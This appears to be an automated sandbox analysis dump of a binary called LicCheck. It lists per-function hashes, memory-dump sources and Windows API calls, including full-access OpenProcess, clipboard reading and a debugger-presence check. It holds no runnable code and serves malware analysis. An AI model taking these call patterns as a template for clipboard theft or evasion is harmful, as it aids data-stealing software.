                                                                                                    • Opcode ID: 00ad208fd8d349850fd566466ee0a2a28deeb049576ef818f6cca88b5614f5b5
                                                                                                    • Instruction ID: cc2246a291cb4667dde2dae0b7800ed79ab8e10f7db14d7d7553d8a7616c3d8a
                                                                                                    • Opcode Fuzzy Hash: 00ad208fd8d349850fd566466ee0a2a28deeb049576ef818f6cca88b5614f5b5
                                                                                                    • Instruction Fuzzy Hash: C5A10232A14159DFCF199F68DC55FAE3BB1AF46320F24015EF811EB291CA399862CBD1

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3907804496
                                                                                                    • Opcode ID: 982e7879c729909a91c5fefbf265d9d789066e43a97d8e6a4e10001e1614cd35
                                                                                                    • Instruction ID: f5817129b2d753a065ca738de5254da2796619d86e14dd436fce198e49989a41
                                                                                                    • Opcode Fuzzy Hash: 982e7879c729909a91c5fefbf265d9d789066e43a97d8e6a4e10001e1614cd35
                                                                                                    • Instruction Fuzzy Hash: 28B1C0B5A04249EFDB15DFA8D884BFDBBB1BF85310F148159E6009B292CB7C9D41CB60

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 007984A0: std::locale::_Init.LIBCPMT ref: 00798532
                                                                                                      • Part of subcall function 00797570: std::locale::_Init.LIBCPMT ref: 007975C2
                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,61DA755C), ref: 00794551
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00794615
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 007946C1
                                                                                                      • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798966
                                                                                                      • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798988
                                                                                                      • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989A8
                                                                                                      • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$OpenProcess
                                                                                                    • String ID: X$p}
                                                                                                    • API String ID: 2479089509-1639695909
                                                                                                    • Opcode ID: ead78b185be1b5713fc1710dae01fc8458caeab3ebb74067340aedab5605780c
                                                                                                    • Instruction ID: c0b7818d60a95a7c8a5eb3e7b5606247d3e6ca31506570d151d547ccea82017c
                                                                                                    • Opcode Fuzzy Hash: ead78b185be1b5713fc1710dae01fc8458caeab3ebb74067340aedab5605780c
                                                                                                    • Instruction Fuzzy Hash: CAA11B70900259DFDB20CF64D948B9DBBB4FF45304F1485AAE40ABB391D7B9AA85CF90

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(8B56C18B,?,007AFED7,00000016,007A9BF2,?,8B56C18B,61DA755C,007A9BF2,8B56C18B), ref: 007AFEEE
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,007AFED7,00000016,007A9BF2,?,8B56C18B,61DA755C,007A9BF2,8B56C18B), ref: 007AFEF5
                                                                                                    • ExitProcess.KERNEL32 ref: 007AFF07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 300930541eea2d5f9620d500687c4d0d30874a50a22db40e8e252417e1a42f79
                                                                                                    • Instruction ID: f77ad3cedf4b6b426133bd28fcf4821f3196fb2bb1dff55ee424dd02479e394e
                                                                                                    • Opcode Fuzzy Hash: 300930541eea2d5f9620d500687c4d0d30874a50a22db40e8e252417e1a42f79
                                                                                                    • Instruction Fuzzy Hash: 0AD09E31004509FFCF112FA0DC0DD4D3F29AF86355754C124F94A95131CF7AA9D19B94

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 007B2C18: GetConsoleOutputCP.KERNEL32(61DA755C,00000000,00000000,00000000), ref: 007B2C7B
                                                                                                    • WriteFile.KERNELBASE(?,00000000,?,007D4240,00000000,0000000C,00000000,00000000,?,00000000,007D4240,00000010,007AC6A2,00000000,00000000,00000000), ref: 007B366E
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 007B3678
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 2915228174-0
                                                                                                    • Opcode ID: 3f10bb1481d5fbf884c28960b5bbfd0a6993a12d14747b40d618632f8907e721
                                                                                                    • Instruction ID: 0dae62fae0c94d24bff3b481d4e0b247dad392eadd9b930da1686b4a28664b48
                                                                                                    • Opcode Fuzzy Hash: 3f10bb1481d5fbf884c28960b5bbfd0a6993a12d14747b40d618632f8907e721
                                                                                                    • Instruction Fuzzy Hash: D361B3B1D04149BFDF218FA8C889FEEBFB9AF19308F144145E814A7252D739DA95CB60

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2638373210-0
                                                                                                    • Opcode ID: 4b087596cc9eb98050c8b4b78452140b153cfb16718e517398dc735e6d38b272
                                                                                                    • Instruction ID: af619c8259f6df4ab921a401c37c13bf5e49c7d353da8a0b73c1d18c4012f2f9
                                                                                                    • Opcode Fuzzy Hash: 4b087596cc9eb98050c8b4b78452140b153cfb16718e517398dc735e6d38b272
                                                                                                    • Instruction Fuzzy Hash: 31518D726046118FCB19CF2CE884A6A77E2EFC4720F158669F858CB356E735DC15CB91

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,007BBE7D,00000000,00000000,00000000,?,007BC11E,00000000,00000007,00000000,?,007BC617,00000000,00000000), ref: 007B371B
                                                                                                    • GetLastError.KERNEL32(00000000,?,007BBE7D,00000000,00000000,00000000,?,007BC11E,00000000,00000007,00000000,?,007BC617,00000000,00000000), ref: 007B3726
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: 8864ec48e10cb1461400fdb170a6fd58fe7d41c7e191a9a973acafd1d6c14bfb
                                                                                                    • Instruction ID: f52c340b28d08b530e4bd1715fbc1bc316b524a3fca3ab23b168d18d91f39c9a
                                                                                                    • Opcode Fuzzy Hash: 8864ec48e10cb1461400fdb170a6fd58fe7d41c7e191a9a973acafd1d6c14bfb
                                                                                                    • Instruction Fuzzy Hash: E6E08CB2500A14ABCB212BA4AC8CFC93B68AB41391F108024F60C9A160DB7D99C5C798

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,007B378A,00000000,CF830579,007D4260,0000000C,007B3846,007AA44C,?), ref: 007B38F9
                                                                                                    • GetLastError.KERNEL32(?,007B378A,00000000,CF830579,007D4260,0000000C,007B3846,007AA44C,?), ref: 007B3903
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 918212764-0
                                                                                                    • Opcode ID: 231388546dd74582c68fe0810def08232b908ec31ffb160b9b30e1daaf073acb
                                                                                                    • Instruction ID: a7253cff9074a5e9406976ab4b23a7d6f70acccc7fb140a7d346a0dba39d2219
                                                                                                    • Opcode Fuzzy Hash: 231388546dd74582c68fe0810def08232b908ec31ffb160b9b30e1daaf073acb
                                                                                                    • Instruction Fuzzy Hash: 6E11483360012056D6355234988ABFD67658F92738F25021DFC158B2D2EFADDDC583A6

Control-flow Graph: [graph image omitted]
APIs
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: a53bd4e7f6ea78b11f5f1706a4b4985137a276a876f2576f09a176fbf79db0f1
• Instruction ID: 84fb404a5d93aedf8bb1781d59293934167523897265b2eaa79d1bff626f82de
• Opcode Fuzzy Hash: a53bd4e7f6ea78b11f5f1706a4b4985137a276a876f2576f09a176fbf79db0f1
• Instruction Fuzzy Hash: 56111575A0420AAFCB09DF58E945ADB7BF9EF48304F144069F809AB251D635EA11CBA4

Control-flow Graph: [graph image omitted]
APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,007B24DE,00000001,00000364,?,00000006,000000FF,?,007A63FB,?,?,?,?), ref: 007B2ADD
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 92dfd1f5c2ff768c7b8273adf43d5aacee3723b62db1c27093308ea03bfb0ed9
• Instruction ID: 50a9da1aca12a8942cc3b591c9b7b9abecde9f987ab1a8a0e46ea0c91a0bb07c
• Opcode Fuzzy Hash: 92dfd1f5c2ff768c7b8273adf43d5aacee3723b62db1c27093308ea03bfb0ed9
• Instruction Fuzzy Hash: 72F0E931606625B7DB316B629C09BDB3758AF417B0B24C112BC04E6192DB6CDC0386E0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,007A63FB,?,?,?,?,?,00792EE7,?,?,?), ref: 007B3B1B
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 139683240b1dbfc4eaed261be8e548605dbb7615aeea9f9ff2fa4d4f01a55a33
• Instruction ID: 48ea9ba6707fd03d5bed6a3705655e28f780e37da585c738bfe06e7855320c96
• Opcode Fuzzy Hash: 139683240b1dbfc4eaed261be8e548605dbb7615aeea9f9ff2fa4d4f01a55a33
• Instruction Fuzzy Hash: 7DE02B7520166197DB3027655C05FDB3B4CDF423B0F140221BC44960C5DB6CDD8185E4
APIs
• CreateFileW.KERNELBASE(?,00000000,?,007C0580,?,?,00000000,?,007C0580,?,0000000C), ref: 007C01AD
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 4af8a486e48e6f5f9182f3664cebd43e4ea71a50fbf5723cb5d9358bf2946e6a
• Instruction ID: 0639f56a29675a1f668ec96442e927648b5c2c8fb600b744f379e8933beb0252
• Opcode Fuzzy Hash: 4af8a486e48e6f5f9182f3664cebd43e4ea71a50fbf5723cb5d9358bf2946e6a
• Instruction Fuzzy Hash: 37D06C3214010DBBDF028F84DC06EDA3BAAFB48714F058100BE1896020C736E861AB94
APIs
• CloseHandle.KERNELBASE(DEADBEEF,61DA755C), ref: 00793CBF
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: ddf27fec875f1b8bac3d48255aba8858e910211f3b702d9c092767684e675de6
• Instruction ID: 1e547bb536edf9e296e04bfd46ab012bf9c0de0e70f09742fcfce74b789207b4
• Opcode Fuzzy Hash: ddf27fec875f1b8bac3d48255aba8858e910211f3b702d9c092767684e675de6
• Instruction Fuzzy Hash: 33F0B4B2944B08AFC710CFA9DD41F9ABBB8FB05721F10422AE41593680D739250586A4
APIs
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: Clipboard$Close$AllocEmptyGlobalOpen
• String ID:
• API String ID: 4230510986-0
• Opcode ID: 06d42b0cc6924884ad1afbee0c8f4d72787d68b07ae05bd1099c4b0edf843c0c
• Instruction ID: 4b0b190d69a0af1a1bfab13ea21fc89f162060f2a9141295f422114706a09163
• Opcode Fuzzy Hash: 06d42b0cc6924884ad1afbee0c8f4d72787d68b07ae05bd1099c4b0edf843c0c
• Instruction Fuzzy Hash: 5E21C131204908BBDB157F35BC8CE6E3769EF53751B088108F946C2142EB2DE88286B9
APIs
• OpenClipboard.USER32(00000000), ref: 00792CB4
• GetClipboardData.USER32(00000001), ref: 00792CC0
• CloseClipboard.USER32 ref: 00792CCC
• GlobalLock.KERNEL32(00000000), ref: 00792CFA
• GlobalUnlock.KERNEL32(00000000), ref: 00792D3F
• CloseClipboard.USER32 ref: 00792D49
• CloseClipboard.USER32 ref: 00792DAB
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: Clipboard$Close$Global$DataLockOpenUnlock
• String ID:
• API String ID: 3729548305-0
• Opcode ID: 74a313afd76fd353906ef31fdc43562e2d9276adbe50da1457ae84c94fcf2ddc
• Instruction ID: d332e4331265f75e7a7b5e9f0a0415cd51a3e337f3d388390b68dd84e33655a2
• Opcode Fuzzy Hash: 74a313afd76fd353906ef31fdc43562e2d9276adbe50da1457ae84c94fcf2ddc
• Instruction Fuzzy Hash: 93413770E10604ABDF14EF34E848BAEB7B1EF85710F24870DF445A7682EB7865C28B94
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,007BD946,00000002,00000000,?,?,?,007BD946,?,00000000), ref: 007BD6C1
• GetLocaleInfoW.KERNEL32(?,20001004,007BD946,00000002,00000000,?,?,?,007BD946,?,00000000), ref: 007BD6EA
• GetACP.KERNEL32(?,?,007BD946,?,00000000), ref: 007BD6FF
Strings
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: f6ca9c87b57f100440091d8e86388836dca07e5bf8e12bf79410fff8349da841
• Instruction ID: 057323de253e0e1f28a73c4e469d76b62486214dc327a44d00f2ae82f1b91320
• Opcode Fuzzy Hash: f6ca9c87b57f100440091d8e86388836dca07e5bf8e12bf79410fff8349da841
• Instruction Fuzzy Hash: E521BEB2A00108ABEB349F54D904BD777A6EB50BA8B5A8028E90EDB100FB3ADD40C350
APIs
  • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
  • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
• GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 007BD909
• IsValidCodePage.KERNEL32(00000000), ref: 007BD952
• IsValidLocale.KERNEL32(?,00000001), ref: 007BD961
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 007BD9A9
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 007BD9C8
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID:
• API String ID: 415426439-0
• Opcode ID: 09624af69af1865c9909e1208c01e9bf63be286942a97b8f41a9e224cbff5dd4
• Instruction ID: 83b21aaf2220538f9b1f2bce0beeed44bc99c6d80396da41fa48600bc78f20ff
• Opcode Fuzzy Hash: 09624af69af1865c9909e1208c01e9bf63be286942a97b8f41a9e224cbff5dd4
• Instruction Fuzzy Hash: 48517D72A00609AFDB20DFA5DC45FEA77B8EF08700F184529E905E7191FB78AE40CB61
APIs
  • Part of subcall function 007B2340: GetLastError.KERNEL32(?,00000008,007B9A39,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7,?), ref: 007B2344
  • Part of subcall function 007B2340: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?,?,?,?,?,00792EE7), ref: 007B23E6
• GetACP.KERNEL32(?,?,?,?,?,?,007B098E,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 007BCF5A
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,007B098E,?,?,?,00000055,?,-00000050,?,?), ref: 007BCF85
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007BD0E8
Strings
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                    • String ID: utf8
                                                                                                    • API String ID: 607553120-905460609
                                                                                                    • Opcode ID: 65b0b5eaafb9d7f7b19bc4860683edf0bb347bef8e2129bca4db67a5a4670e28
                                                                                                    • Instruction ID: cadda06e28795406c9693bbb3becbadfdb0a6b8e9eab7e7704b00c851d7db7b3
                                                                                                    • Opcode Fuzzy Hash: 65b0b5eaafb9d7f7b19bc4860683edf0bb347bef8e2129bca4db67a5a4670e28
                                                                                                    • Instruction Fuzzy Hash: 6971B272600606EBEB35AB74CC4AFFA73A9EF44700F14846AF505DB181FA7DED418664
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 3213747228-0
                                                                                                    • Opcode ID: e030b2298e0d9f9cb91cf1a70554882ac09d070c00e7bb26036b4e9e32c17164
                                                                                                    • Instruction ID: 14b531a78153b30328c98b66602c2742de3a37de0c6289c94c44bc120fd5e52d
                                                                                                    • Opcode Fuzzy Hash: e030b2298e0d9f9cb91cf1a70554882ac09d070c00e7bb26036b4e9e32c17164
                                                                                                    • Instruction Fuzzy Hash: 36B13832E042559FDB158F68C881BFEBBB5EF59310F14416AE905EB242D63DDE81CBA0
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007A5B76
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 007A5C42
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007A5C62
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 007A5C6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
